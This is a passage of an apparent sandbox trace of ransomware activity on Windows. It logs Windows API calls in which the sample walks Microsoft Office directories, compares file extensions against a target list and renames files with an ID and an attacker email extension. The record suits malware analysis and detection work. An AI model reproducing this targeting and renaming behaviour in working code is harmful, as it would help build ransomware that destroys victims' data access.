SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.884] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.884] CloseHandle (hObject=0x434) returned 1 [0167.885] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.885] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.885] CloseHandle (hObject=0x434) returned 1 [0167.886] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.886] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.886] CloseHandle (hObject=0x434) returned 1 [0167.887] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.887] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.887] CloseHandle (hObject=0x434) returned 1 [0167.888] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.888] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.888] CloseHandle (hObject=0x434) returned 1 [0167.891] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.891] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WORKFLOW.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\workflow.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.891] CloseHandle (hObject=0x434) returned 1 [0167.893] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.893] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XFUNC.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xfunc.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.893] CloseHandle (hObject=0x434) returned 1 [0167.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlintl32.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\XLINTL32.DLL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlintl32.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.896] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.896] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1036\\MSO.ACL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1036\\mso.acl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.896] CloseHandle (hObject=0x434) returned 1 [0167.897] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.897] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\3082\\MSO.ACL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\3082\\mso.acl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.897] CloseHandle (hObject=0x434) returned 1 [0167.898] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCICONS.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accicons.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCICONS.EXE.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accicons.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.901] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZDAT12.ACCDU" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzdat12.accdu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZDAT12.ACCDU.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzdat12.accdu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.903] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZUSR12.ACCDU" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzusr12.accdu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZUSR12.ACCDU.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzusr12.accdu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0167.908] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.908] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\FAXEXT.ECF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\faxext.ecf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.908] CloseHandle (hObject=0x434) returned 1 [0169.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashup.client.windows.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.708] lstrlenW (lpString=".doc") returned 4 [0169.708] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.708] lstrlenW (lpString=".docx") returned 5 [0169.709] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.709] lstrlenW (lpString=".pdf") returned 4 [0169.709] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.709] lstrlenW (lpString=".xls") returned 4 [0169.709] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.709] lstrlenW (lpString=".xlsx") returned 5 [0169.709] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.709] lstrlenW (lpString=".ppt") returned 4 [0169.709] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.709] lstrlenW (lpString=".zip") returned 4 [0169.709] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.709] lstrlenW (lpString=".rar") returned 4 [0169.709] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.709] lstrlenW (lpString=".bz2") returned 4 [0169.709] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.709] lstrlenW (lpString=".7z") returned 3 [0169.709] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.709] lstrlenW (lpString=".dbf") returned 4 [0169.709] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.709] lstrlenW (lpString=".1cd") returned 4 [0169.709] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.710] lstrlenW (lpString=".jpg") returned 4 [0169.710] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.710] lstrlenW (lpString=".doc") returned 4 [0169.710] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.710] lstrlenW (lpString=".docx") returned 5 [0169.710] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.710] lstrlenW (lpString=".pdf") returned 4 [0169.710] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.710] lstrlenW (lpString=".xls") returned 4 [0169.710] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.710] lstrlenW (lpString=".xlsx") returned 5 [0169.710] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.710] lstrlenW (lpString=".ppt") returned 4 [0169.710] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.710] lstrlenW (lpString=".zip") returned 4 [0169.710] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.710] lstrlenW (lpString=".rar") returned 4 [0169.710] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.710] lstrlenW (lpString=".bz2") returned 4 [0169.710] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.710] lstrlenW (lpString=".7z") returned 3 [0169.711] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.711] lstrlenW (lpString=".dbf") returned 4 [0169.711] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.711] lstrlenW (lpString=".1cd") returned 4 [0169.711] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0169.711] lstrlenW (lpString=".jpg") returned 4 [0169.711] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.711] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0169.711] lstrlenW (lpString="Microsoft.Mashup.Document.resources.dll") returned 39 [0169.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashup.document.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0169.713] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=203432) returned 1 [0169.713] CloseHandle (hObject=0x52c) returned 1 [0169.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashup.document.resources.dll")) returned 0x220 [0169.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashup.document.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0169.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashup.document.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.714] lstrlenW (lpString=".doc") returned 4 [0169.714] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.714] lstrlenW (lpString=".docx") returned 5 [0169.714] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.714] lstrlenW (lpString=".pdf") returned 4 [0169.714] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.714] lstrlenW (lpString=".xls") returned 4 [0169.714] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.714] lstrlenW (lpString=".xlsx") returned 5 [0169.714] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.714] lstrlenW (lpString=".ppt") returned 4 [0169.714] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.714] lstrlenW (lpString=".zip") returned 4 [0169.715] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.715] lstrlenW (lpString=".rar") returned 4 [0169.715] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.715] lstrlenW (lpString=".bz2") returned 4 [0169.715] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.715] lstrlenW (lpString=".7z") returned 3 [0169.715] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.715] lstrlenW (lpString=".dbf") returned 4 [0169.715] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.715] lstrlenW (lpString=".1cd") returned 4 [0169.715] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.715] lstrlenW (lpString=".jpg") returned 4 [0169.715] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.715] lstrlenW (lpString=".doc") returned 4 [0169.715] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.715] lstrlenW (lpString=".docx") returned 5 [0169.715] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.715] lstrlenW (lpString=".pdf") returned 4 [0169.716] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.716] lstrlenW (lpString=".xls") returned 4 [0169.716] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.716] lstrlenW (lpString=".xlsx") returned 5 [0169.716] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.716] lstrlenW (lpString=".ppt") returned 4 [0169.716] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.716] lstrlenW (lpString=".zip") returned 4 [0169.716] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.716] lstrlenW (lpString=".rar") returned 4 [0169.716] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.716] lstrlenW (lpString=".bz2") returned 4 [0169.716] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.716] lstrlenW (lpString=".7z") returned 3 [0169.716] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.716] lstrlenW (lpString=".dbf") returned 4 [0169.716] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.716] lstrlenW (lpString=".1cd") returned 4 [0169.716] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.Mashup.Document.resources.dll") returned 144 [0169.717] lstrlenW (lpString=".jpg") returned 4 [0169.717] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.717] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0169.717] lstrlenW (lpString="Microsoft.MashupEngine.resources.dll") returned 36 [0169.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashupengine.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0169.718] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=580264) returned 1 [0169.718] CloseHandle (hObject=0x52c) returned 1 [0169.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashupengine.resources.dll")) returned 0x220 [0169.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashupengine.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0169.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\nl\\microsoft.mashupengine.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.719] lstrlenW (lpString=".doc") returned 4 [0169.719] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.719] lstrlenW (lpString=".docx") returned 5 [0169.719] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.719] lstrlenW (lpString=".pdf") returned 4 [0169.719] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.719] lstrlenW (lpString=".xls") returned 4 [0169.719] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.719] lstrlenW (lpString=".xlsx") returned 5 [0169.719] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.719] lstrlenW (lpString=".ppt") returned 4 [0169.719] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.719] lstrlenW (lpString=".zip") returned 4 [0169.719] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.719] lstrlenW (lpString=".rar") returned 4 [0169.719] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.719] lstrlenW (lpString=".bz2") returned 4 [0169.719] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.719] lstrlenW (lpString=".7z") returned 3 [0169.719] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.719] lstrlenW (lpString="C:\\Program 